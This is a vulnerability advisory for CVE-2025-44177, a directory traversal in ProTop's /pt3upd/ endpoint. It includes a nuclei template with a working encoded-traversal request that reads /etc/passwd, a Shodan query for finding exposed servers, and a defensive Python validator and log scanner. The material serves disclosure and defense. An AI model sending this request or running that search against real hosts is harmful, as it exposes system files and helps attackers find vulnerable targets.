White Star Software ProTop Directory Traversal Vulnerability

Vulnerability Information

Vulnerability name: White Star Software ProTop Directory Traversal Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-44177

Vulnerability type: Directory traversal

Severity: High

Vulnerability description: White Star Software ProTop is widely used software, deployed mainly in enterprise services to provide efficient data processing and communication. Typical deployments are internal corporate networks and data centers, where it is favored for its stability and efficiency. The directory traversal vulnerability described here lies in ProTop's /pt3upd/ endpoint and affects version 4.4.2-2024-11-27. The technical root cause is improper handling of user-supplied input, specifically insufficient validation of encoded traversal sequences, which lets an attacker bypass the intended path restrictions and access arbitrary files on the system. As a result, an unauthenticated attacker can remotely read sensitive files on the underlying operating system, such as /etc/passwd, causing information disclosure that can be leveraged for further, more serious attacks. Because exploitation requires no authentication and can be automated, the vulnerability carries a high security risk and may pose a serious threat to affected systems.

Vendor: White Star Software

Product: ProTop

Affected version: 4.4.2-2024-11-27

Search syntax: html:"ProTop"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/a24494c988a3d628025caedd75a539980285350f/http%2Fcves%2F2025%2FCVE-2025-44177.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details

```yaml
id: CVE-2025-44177

info:
  name: White Star Software ProTop - Directory Traversal
  author: s-cu-bot
  severity: high
  description: |
    A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint.
    An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
  remediation: |
    Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-44177
    - https://client.protop.co.za/
    - https://wss.com/
    - https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-44177
    cwe-id: CWE-22
    cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: white-star-software
    product: protop
    shodan-query: html:"<title>ProTop"
  tags: cve2025,lfi,traversal,protop

http:
  - raw:
      - |
        GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: header
        words:
          - 'application/octet-stream'
          - 'filename="passwd"'
        condition: and

      - type: status
        status:
          - 200
```

Category: Github Poc

Tags: #projectdiscovery/nuclei-templates:github issues #Directory traversal

Author: lianccc

Published: July 31, 2025

License: CC BY 4.0 (https://creativecommons.org/licenses/by/4.0/)
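As an added defensive example (not code from this page, from White Star Software, or from the nuclei template): a Python path validator that percent-decodes the request target before looking for `..`, which is the step the advisory says the /pt3upd/ handler effectively skipped, together with a scan over constructed access-log lines for the same encoded-traversal pattern. The `PT3UPD_ROOT` directory and the handler logic are assumptions made for the example.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import unquote

# Hypothetical document root behind the /pt3upd/ endpoint (an assumption, not ProTop's real layout).
PT3UPD_ROOT = "/opt/protop/pt3upd"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def fully_decode(text: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so '..%2f' and '..%252f' both become '../'."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def resolve_under_root(request_path: str, root: str = PT3UPD_ROOT):
    """Map a /pt3upd/ request to a file under root, or return None if it would escape root."""
    prefix = "/pt3upd/"
    if not request_path.startswith(prefix):
        return None
    # Decode first, then inspect: checking the raw path would never see '..%2f' as a climb.
    decoded = fully_decode(request_path[len(prefix):]).replace("\\", "/")
    parts = [p for p in decoded.split("/") if p not in ("", ".")]
    if any(p == ".." for p in parts):
        return None  # reject any climb outright rather than trying to "repair" the path
    return str(PurePosixPath(root, *parts))

def find_traversal_attempts(log_lines):
    """Return request targets from access-log lines whose decoded path contains a '..' segment."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        target = match.group(1)
        decoded = fully_decode(target).replace("\\", "/")
        if ".." in decoded.split("/"):
            hits.append(target)
    return hits

# Constructed sample access-log lines (not real traffic); the first reuses the request from the advisory.
SAMPLE_LOG = [
    '198.51.100.7 - - [31/Jul/2025:10:00:01 +0000] "GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1823',
    '198.51.100.8 - - [31/Jul/2025:10:00:02 +0000] "GET /pt3upd/release-notes.txt HTTP/1.1" 200 412',
    '198.51.100.9 - - [31/Jul/2025:10:00:03 +0000] "GET /pt3upd/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 404 0',
]
```

The same decode-then-check ordering applies to a WAF or reverse-proxy rule: a signature matched against the raw, still-encoded path misses the request shown in the template.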